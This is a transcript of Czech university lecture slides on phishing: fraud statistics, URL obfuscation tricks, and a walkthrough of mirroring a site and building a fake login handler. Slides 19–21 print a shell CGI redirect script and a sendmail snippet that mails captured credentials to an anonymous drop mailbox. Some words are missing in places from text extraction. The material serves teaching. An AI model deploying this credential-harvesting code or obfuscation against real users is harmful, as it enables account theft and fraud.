Počítačové viry a bezpečnost počítačových systémů. Phishing
|
|
- Sára Burešová
- před 10 lety
- Počet zobrazení:
Transkript
1 ! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic! ivan.zelinka@vsb.cz Phone: GSM: prof. Ing. Ivan Zelinka, Ph.D.
2 Schéma přednášky
3 Schéma přednášky
4 Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové ů stoupá (např. v r během 6. měsících o procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy ů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně
5 Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 ů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se y vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů
6 Pishing
7 Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.
8 Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného upříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".
9 Pishing Příklad : matení oka Jednoduchým příkladem je wuw.citibank.com@ Webový prohlížeč přečte pravou stranu adresy a přejde na Google. v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: ftp://username:pass@ftp.site.com. Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216* )*(256+57)*( ) = , čímž nás dostane na google.com
10 Pishing Lze zadat 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme
11 Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo u. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center,
12 Phish statistika Na Jednu hromadnou zásilku čítající ů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.
13 Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné ové adresy: Vytvořte skupinu ových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto ových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů ů každý den.
14 Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v u - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.
15 Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.
16 Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.
17 Obsah souboru robot.txt může být například: Falešná identita - zrcadlo
18 Falešná identita - nastavení pishingového serveru
19 Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.
20 Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e 's@.*/cgi/@/cgi/@'' # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: <html> <body> This page has moved to <a href=\" JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.
21 Falešná identita - založení anonymní schránky pro zachycení dat použijeme ovou adresu jako naši anonymní schránku, pro ukázku použijme blind_drop@securescience.net. SENDER=stolen_data@securescience.net RECIPIENT=blind_drop@securescience.net POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!
22 Falešná identita - příprava phishingového u
23 Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do ové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.
Stinnou stránkou elektronické komunikace nejsou jenom HOAXy. Josef Džubák www.hoax.cz
Stinnou stránkou elektronické komunikace nejsou jenom HOAXy Josef Džubák www.hoax.cz HOAX? Co to je? Anglické slovo, znamená v překladu: - Mystifikace Podvod Žert Novinářská kachna Kde je začátek? Fámy
Vývoj Internetových Aplikací
10 Vývoj Internetových Aplikací Bezpečnost Ing. Michal Radecký, Ph.D. www.cs.vsb.cz/radecky https://www.ted.com/talks/mikko_hypponen_fighting_ viruses_defending_the_net Co je to Cyber kriminalita http://www.internetprovsechny.cz/pocitacova-kriminalita-a-bezpecnost/
Práce s e-mailovými schránkami v síti Selfnet
Práce s e-mailovými schránkami v síti Selfnet Obsah návodu Základní informace k nastavení schránky selfnet.cz...2 Doporučené parametry nastavení e-mailového klienta...2 Základní informace k nastavení e-mailové
Bezpečnostní rizika spojená s platebními službami
Bezpečnostní rizika spojená s platebními službami Vážení klienti, v souvislosti s poskytováním platebních služeb naší společností SAB Finance a.s., IČO: 24717444, se sídlem Praha 1 - Nové Město, Senovážné
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) Bc. Aleš Joska Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky 3. duben 2018 Aleš Joska Cross-Site Scripting (XSS) 3. duben 2018 1 / 16
Návod na používání systému Bakaláři pro zákonné zástupce žáků Základní školy a mateřské školy Mosty u Jablunkova 750
Návod na používání systému Bakaláři pro zákonné zástupce žáků Základní školy a mateřské školy Mosty u Jablunkova 750 Návod na modul Internetová žákovská knížka systému Bakaláři. Kromě informací o prospěchu,
Faxový server společnosti PODA s.r.o.
Faxový server společnosti PODA s.r.o. Vážení zákazníci, jako doplněk k poskytovaným službám VoIP jsme pro vás zprovoznili službu faxového serveru. Tento server vám umožní pohodlně odesílat a přijímat faxy
Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz
Jen technická ochrana nestačí Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz Statistika nuda je Statistika technologií 98 % uživatelů PC používá antivirový program 70 % uživatelů
Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě
Aktuální hrozby internetu 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě Trojské koně Viz předchozí hodina. Škodlivý program, který v počítači vytváří podmínky pro přijímání dalších škodlivých programů.
Příručka pro školy. Školní projekt na Portálu farmáře
Příručka pro školy Školní projekt na Portálu farmáře Obsah 1. Přihlášení a změna kontaktních údajů... 2 1.1 První přihlášení... 2 2. Schválení dodávky... 5 2.1 Informační email... 5 2.2 Aplikace pro odsouhlasení
Nejčastější podvody a útoky na Internetu. Pavel Bašta
Nejčastější podvody a útoky na Internetu Pavel Bašta pavel.basta@nic.cz 25.05.2017 CZ.NIC, z.s.p.o. Hlavní činnost správa doménových jmen.cz CSIRT.CZ Národní CSIRT tým pro ČR Založen v rámci plnění grantu
Antispamové technologie
Antispamové technologie CZ.NIC z.s.p.o. Petr Hruška petr.hruska@nic.cz 4. 6. 2009 1 Statistiky první spam odeslán už v roce 1978 prudký nárůst s rozvojem internetu (2003) v roce 2005 překročila míra spamu
CISCO CCNA I. 8. Rizika síťového narušení
CISCO CCNA I. 8. Rizika síťového narušení Základní pojmy Rizika Devastace sítě Ztráta dat a důležitých informací Ztráta kontroly nad sítí Následnéčasové ztráty Krádež dat Ztráta identity (bankovní operace
Bezpečnost internetového bankovnictví, bankomaty
, bankomaty Filip Marada, filipmarada@gmail.com KM FJFI 15. května 2014 15. května 2014 1 / 18 Obsah prezentace 1 Bezpečnost internetového bankovnictví Možná rizika 2 Bankomaty Výběr z bankomatu Možná
Nejzajímavější bezpečnostní incidenty CSIRT.CZ. Pavel Bašta pavel.basta@nic.cz 29.01.2015
Nejzajímavější bezpečnostní incidenty CSIRT.CZ Pavel Bašta pavel.basta@nic.cz 29.01.2015 CSIRT.CZ Národní CSIRT tým pro ČR Založen v rámci plnění grantu MV ČR Kybernetické hrozby z hlediska bezpečnostních
E-mail Outlook Express
E-mail Outlook Express název anotace očekávaný výstup druh učebního materiálu druh interaktivity Elektronická pošta Prezentace je zaměřena na seznámení žáků s elektronickou komunikací. Žáci se seznámí
Bezpečnostní zásady. Příloha č. 1 k Podmínkám České národní banky pro používání služby ABO-K internetové bankovnictví
Bezpečnostní zásady Česká národní banka (ČNB) věnuje trvalou pozornost nadstandardnímu zabezpečení aplikace ABO-K internetové bankovnictví (dále jen ABO-K ), proto využívá moderní technologie pro ochranu
Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115
Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: Číslo šablony: 27 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek: Anotace: CZ.1.07/1.5.00/34.0410
Návod na používání webmailu
Návod na používání webmailu Každý student a zaměstnanec UTB má svoji vlastní školní e-mailovou schránku. K té se lze připojit buď pomocí webového klienta http://webmail.utb.cz, nebo libovolného e-mailového
Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je
Bezpečnostní zásady Česká národní banka (ČNB) věnuje trvalou pozornost nadstandardnímu zabezpečení aplikace ABO-K internetové bankovnictví (dále jen ABO-K ), proto využívá moderní technologie pro ochranu
Škodlivý kód, útok na aplikace. Ing. Miloslav Hub, Ph.D. 5. prosince 2007
Škodlivý kód, útok na aplikace Ing. Miloslav Hub, Ph.D. 5. prosince 2007 Viry (1) Nejstaršíforma škodlivého kódu. Základní funkce: Šíření Destrukce Techniky šíření: Bootovacíviry z diskety Souborové viry
EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12)
EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12) Upozornění: Oficiální znění ECDL/ICDL Sylabu IT Security 1.0 je publikováno na webových stránkách
Typy bezpečnostních incidentů
Typy bezpečnostních incidentů Aleš Padrta CESNET, z. s. p. o. Praha 12.12. 2008 Obsah Úvodní slovo Co je to bezpečnostní incident Klasifikace bezpečnostních incidentů Pojmy související s bezpečnostními
Příručka pro školy. Školní projekt na Portálu farmáře
Příručka pro školy Školní projekt na Portálu farmáře Obsah 1. Přihlášení a změna kontaktních údajů... 2 1.1 První přihlášení... 2 2. Schválení dodávky... 4 2.1 Informační email... 4 2.2 Aplikace pro odsouhlasení
Poznámky k oficiálním cvičným testům pro modul M12
Poznámky k oficiálním cvičným testům pro modul M12 Testovací platforma Software o MS Word 2007 až 2010. o Operační systém Windows (XP, 7) o Antivirový program, v němž je možno provést test jedné konkrétní
Webové hrozby KDO 6.5.2008
Webové hrozby KDO 6.5.2008 INFOSEC informační bezpečnost Fyzická bezpečnost (PHYSEC) Počítačová bezpečnost (COMPUSEC) Personální bezpečnost (PERSEC) Komunikačni bezpečnost (COMSEC) Logická bezpečnost (LOGISEC)
Příručka nastavení funkcí snímání
Příručka nastavení funkcí snímání WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_CS 2004. Všechna práva vyhrazena. Uplatňovaná ochrana autorských práv se vztahuje na všechny formy a záležitosti
MƏj úĭet Uživatelský manuál Verze 1.01/2010
M j ú et Uživatelský manuál Verze 1.01/2010 Obsah 1 Přihlášení do aplikace Klientské centrum.......................................................................................... 4 2 Zprávy systému...................................................................................................................
OCHRANA SOUKROMÍ CRON SYSTEMS, S.R.O. PRO WEBOVOU STRÁNKU 1. Obecné informace.
OCHRANA SOUKROMÍ CRON SYSTEMS, S.R.O. PRO WEBOVOU STRÁNKU www.orphica.cz 1. Obecné informace. 1. Provozovatelem webové stránky je společnost Cron Systems, s.r.o., Alexandra Rudnaya 21, 010 01 Žilina, Slovensko,
Adware ENISA. Aktivní kybernetická obrana. Aktivum. Analýza hrozeb. Analýza počítačového viru. Antispamový filtr. Antivirový program
Adware ENISA Aktivní kybernetická obrana Aktivum Analýza hrozeb Analýza počítačového viru Antispamový filtr Antivirový program Asymetrická kryptografie Autenticita Autentizace (dat, identity, klíče, zprávy)
Příručka rychlého nastavení snímání do e-mailu
Xerox WorkCentre M118i Příručka rychlého nastavení snímání do e-mailu 701P42710 Tato příručka představuje pohotovou referenci k nastavení funkce snímání do e-mailu na přístroji. Naleznete v ní tyto postupy:
Uživatel počítačové sítě
Uživatel počítačové sítě Intenzivní kurz CBA Daniel Klimeš, Ivo Šnábl Program kurzu Úterý 8.3.2005 15.00 18.00 Teoretická část Středa 9.3.2005 15.00 19.00 Praktická práce s počítačem Úterý 15.3.2005 15.00
Už ivatelska dokumentace
Už ivatelska dokumentace Aplikace Portál úspěšných projektů je určena k publikování informací o projektech realizovaných za přispění některého z Operačních programů v gesci Ministerstva vnitra České republiky.
Elektronická evidence tržeb v programu TRIFID
Elektronická evidence tržeb v programu TRIFID Aktuální informace k EET lze získat na webu www.etrzby.cz K vykazování tržeb prostřednictvím EET je nutné mít: - Program TRIFID 2017 (verze 6.50, nebo novější)
Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra
Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Důvod přidělování speciálních schránek. Podle posledních statistik kolem 90 % všech E-mailů na Internetu tvoří nevyžádaná pošta. Patří
Uživatelská příručka. Chráníme více lidí před více online hrozbami než kdokoli jiný na světě.
Uživatelská příručka Chráníme více lidí před více online hrozbami než kdokoli jiný na světě. Chraňte své životní prostředí. Je to správné. Společnost Symantec odstranila z tohoto návodu obálku, aby snížla
REGISTRACE UŽIVATELE
OBCHODOVÁNÍ S POVOLENKAMI REJSTŘÍK UNIE REGISTRACE UŽIVATELE Stručná uživatelská příručka Obsah Spuštění aplikace... 2 Přihlášení a odhlášení... 3 Vytvoření uživatelského účtu EU Login a přidání čísla
Inovace výuky prostřednictvím ICT v SPŠ Zlín, CZ.1.07/1.5.00/34.0333 Vzdělávání v informačních a komunikačních technologií
VY_32_INOVACE_31_19 Škola Název projektu, reg. č. Vzdělávací oblast Vzdělávací obor Tematický okruh Téma Tematická oblast Název Autor Vytvořeno, pro obor, ročník Anotace Přínos/cílové kompetence Střední
1.3. HW (hardware): veškeré fyzicky existující technické vybavení počítače nebo serveru.
Obchodní podmínky Obchodní podmínky pro službu Webhosting platné od 5. 11. 2015 ve vztahu mezi zákazníkem a dodavatelem: Pavel Trávníček (IČ: 724 72 936), U Párníků 698/10, 196 00 Praha 9 Čakovice. 1.
Analýza podvodných ových zpráv
Analýza podvodných e-mailových zpráv pro AOBP 17. dubna 2018 VIAVIS a. s. Obránců Míru 237/35 703 00 Ostrava tel.: +420 595 174 250 e-mail: info@viavis.cz web: www.viavis.cz zapsána v Copyright 2018 by
Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy
Označení materiálu: VY_32_INOVACE_IKT_K_55 Autor: Jaromír Škrabal Tematický celek: Základy hardware a sítí Učivo (téma): Hrozby internetu škodlivé programy www.zlinskedumy.cz Stručná charakteristika Materiál
2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS)
Systém řízení informační bezpečností: Úvod RNDr. Igor Čermák, CSc. Katedra počítačových systémů Fakulta informačních technologií České vysoké učení technické v Praze Igor Čermák, 2011 Informační bezpečnost,
Internet 3 publikování na webu, zásady bezpečnosti
Internet 3 publikování na webu, zásady bezpečnosti Martin Hejtmánek hejtmmar@fjfi.cvut.cz http://kmlinux.fjfi.cvut.cz/ hejtmmar Počítačový kurs Univerzity třetího věku na FJFI ČVUT Znalci 2. dubna 2009
Hromadný e-mail / Newsletter
. Hromadný e-mail / Newsletter Tato funkce slouží pro hromadné rozesílání personifikovaných e-mailů vybraným skupinám zákazníků ze stromu zatřídění nebo výběru. Obsahuje spoustu zajímavých funkcí, jako
Antivirové programy, Firewally, AntiSpywary, AntiSpamy
Antivirové programy, Firewally, AntiSpywary, AntiSpamy Antivirové programy aneb jak zabezpečit svůj počítač. Základní definice Antivirový program sleduje všechny nejpodstatnější vstupní/výstupní místa,
Co je to sociální síť?
Sociální sítě Co je to sociální síť? Sociální síť je webová služba, která umožňuje jednotlivcům: vybudování veřejného nebo poloveřejného profilu v omezeném systému vytvořit seznam uživatelů, s nimiž něco
1. Způsoby zabezpečení internetových bankovních systémů
Každoročně v České republice roste počet uživatelů internetu, přibývá povědomí o internetových službách, uživatelé hojně využívají internetového bankovnictví. Podle údajů Českého statistického úřadu ve
Počítačová bezpečnost Aktualizace OS a aplikačních programů Firewall a další bezpečnostní nástroje
Počítačová bezpečnost aktualizace operačního systému a aplikačních programů firewall a další bezpečnostní nástroje počítačové viry a červy, spyware metody útoků přes webové stránky a elektronickou poštu
Připojení ke vzdálené aplikaci Target 2100
Připojení ke vzdálené aplikaci Target 2100 Pro úspěšné připojení ke vzdálené aplikaci Target 2100 je nutné připojovat se ze stanice s Windows XP SP3, Windows Vista SP1 nebo Windows 7. Žádná VPN není potřeba,
REGISTRACE UŽIVATELE
OBCHODOVÁNÍ S POVOLENKAMI REJSTŘÍK UNIE REGISTRACE UŽIVATELE Stručná uživatelská příručka Obsah Spuštění aplikace... 2 Přihlášení a odhlášení... 3 Vytvoření uživatelského účtu EU Login a přidání čísla
Google Apps. pošta 1. verze 2012
Google Apps pošta verze 0 Obsah Obsah... Úvod... První přihlášení... Seznámení s emailovou schránkou... Další přihlášení, odhlášení... 7 Úvod V dnešní době chce mít každý své informace po ruce. Díky Internetu
Role ISDS v digitalizaci
Role ISDS v digitalizaci ISSS 2019 Mgr. Andrea Barešová Česká pošta, s.p. Informační systém datových schránek v číslech 2 Deset let provozu ISDS ISDS zanedlouho završí 10 let od svého spuštění v červenci
Informační a komunikační technologie. 1.5 Malware
Informační a komunikační technologie 1.5 Malware Učební obor: Kadeřník, Kuchař-číšník Ročník: 1 Malware ( malicius - zákeřný) Mezi tuto skupinu patří: Viry Červi Trojské koně Spyware Adware... a další
Hromadné licence společnosti Adobe
Hromadné licence společnosti Adobe Konzole pro správu zákazníků programu VIP Příručka pro uživatele programu Value Incentive Plan (VIP) Verze 2.5 20. listopadu 2013 Obsah Co je Konzole pro správu pro zákazníky
Použití Office 365 na iphonu nebo ipadu
Použití Office 365 na iphonu nebo ipadu Úvodní příručka Kontrola e-mailů iphone nebo ipad si můžete nastavit tak, aby odesílal a přijímal poštu z vašeho účtu Office 365. Kontrola kalendáře z libovolného
Inovace bakalářského studijního oboru Aplikovaná chemie
http://aplchem.upol.cz CZ.1.07/2.2.00/15.0247 Tento projekt je spolufinancován Evropským sociálním fondem a státním rozpočtem České republiky. Internet a zdroje Elektronická pošta a její správa, bezpečnost
Bezpečnost. Michal Dočekal
Michal Dočekal 2011 Právní doložka Právní doložka autor není právník autor neručí za pravdivost uvedených informací autor neručí za jakékoliv případné škody způsobené uvedenými informaci Osnova 1 Bezpečnost
ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU
ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU Verze ze dne 15. 2. 2011 ČLÁNEK 1 PŘEDMĚT 1.1 Tyto zvláštní podmínky mají za cíl definovat technické a finanční podmínky, za kterých se OVH.CZ zavazuje umístit na své
Uživatelská dokumentace
Uživatelská dokumentace k projektu Czech POINT Provozní řád Žádost o výpis nebo opis z Rejstříku trestů podle zákona č. 124/2008 Sb. Vytvořeno dne: 11.4.2007 Aktualizováno: 25.5.2010 Verze: 4.3 2009 MVČR
Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni
Webové aplikace Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Harmonogram Dopolední blok 9:00 12:30 Ing. Dostal Úvod, XHTML + CSS Ing. Brada,
mbank.cz mtransfer Okamžitá notifikace o mtransferu Dokumentace pro externího partnera
mtransfer Okamžitá notifikace o mtransferu Dokumentace pro externího partnera 1/6 Obsah 1 SLOVNÍK POJMŮ... 3 2 ÚVOD... 4 3 POPIS ŘEŠENÍ NPM... 4 4 ZPŮSOB KOMUNIKACE EXTERNÍHO PARTNERA S MBANK - SPECIFIKACE
Uživatelská příručka. Parcel. Internetová aplikace pro sběr dat o cenách za dodávání balíků. Příručka pro poskytovatele služeb dodávání balíků (PDSP)
Uživatelská příručka Parcel Internetová aplikace pro sběr dat o cenách za dodávání balíků Příručka pro poskytovatele služeb dodávání balíků (PDSP) Poslední aktualizace: 19.12.2018 Obsah Úvod 1 Začínáme
Inovace bakalářského studijního oboru Aplikovaná chemie http://aplchem.upol.cz
http://aplchem.upol.cz CZ.1.07/2.2.00/15.0247 Tento projekt je spolufinancován Evropským sociálním fondem a státním rozpočtem České republiky. Internet a zdroje Elektronická pošta a její správa, bezpečnost
Mgr. Stěpan Stěpanov, 2013
Mgr. Stěpan Stěpanov, 2013 Co to je počítačový spam? Otázka 1 Počítačový virus Masově šířená zpráva Šunka, prodávaná online Druh spywaru Odpověď 1 Počítačový spam je nevyžádané masově šířené mediální sdělení,
Testování webových aplikací Seznam.cz
Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci
Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci
Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci Obsah 1 Základní informace o aplikaci... 2 2 Uživatelský účet... 2 2.1 Dodatečná autentizace... 2 2.2 Aktivace nově založeného uživatelského
Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů
Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů Jedním z řešení bezpečného vzdáleného přístupu mobilních uživatelů k firemnímu informačnímu systému je použití technologie
Bezpečnost a virová problematika
Počítačový virus: Program, který se dokáže šířit sám a bez vědomí uživatele. Vznik již na přelomu 60. a 70. let 20. stol. Vkládá vlastní škodlivý kód do jiných spustitelných souborů, dokumentů. Musí se
Phishingové útoky v roce 2014
Phishingové útoky v roce 2014 Aleš Padrta 1 FLAB a CESNET-CERTS CESNET-CERTS Bezpečnostní tým pro reakci na incidenty Přehled o proběhlých incidentech FLAB Forenzní LABoratoř Podpůrné pracoviště CESNET-CERTS
REGISTRACE UŽIVATELE
OBCHODOVÁNÍ S POVOLENKAMI REJSTŘÍK UNIE REGISTRACE UŽIVATELE Stručná uživatelská příručka Obsah Spuštění aplikace... 2 Přihlášení a odhlášení... 3 Vytvoření uživatelského účtu ECAS a přidání čísla mobilního
Manuál PVU dodavatel
Manuál PVU dodavatel Platnost pro elektronický nástroj X-EN verze 4 a novější 1 Registrace... 2 2 Přihlášení a odhlášení... 2 3 Správa profilu... 2 3.1 Vytvoření uživatelského účtu... 3 3.2 Ověření identity
Elektronická evidence tržeb v programu TRIFID
Elektronická evidence tržeb v programu TRIFID Aktuální informace k EET lze získat na webu www.etrzby.cz K vykazování tržeb prostřednictvím EET je nutné mít: - Program TRIFID 2017 (verze 6.50, nebo novější)
Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci
Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci (příručku ve formátu PDF si můžete stáhnout zde) Obsah 2.1 Dodatečná autentizace... 2 2.2 Aktivace nově založeného uživatelského účtu...
PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz
MANUÁL K PŘIHLAŠOVACÍMU SYSTÉMU PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz 1 PŘÍSTUP DO SYSTÉMU Přímo na http://rezervace.protravel.cz
Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe
Uživatelská příručka Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe Ministerstvo zemědělství České republiky únor
Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe
Uživatelská příručka Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe verze pro mobilní zařízení a čtečky elektronických
Bezpečnostní rizika chytrých spotřebičů a Internetu věcí
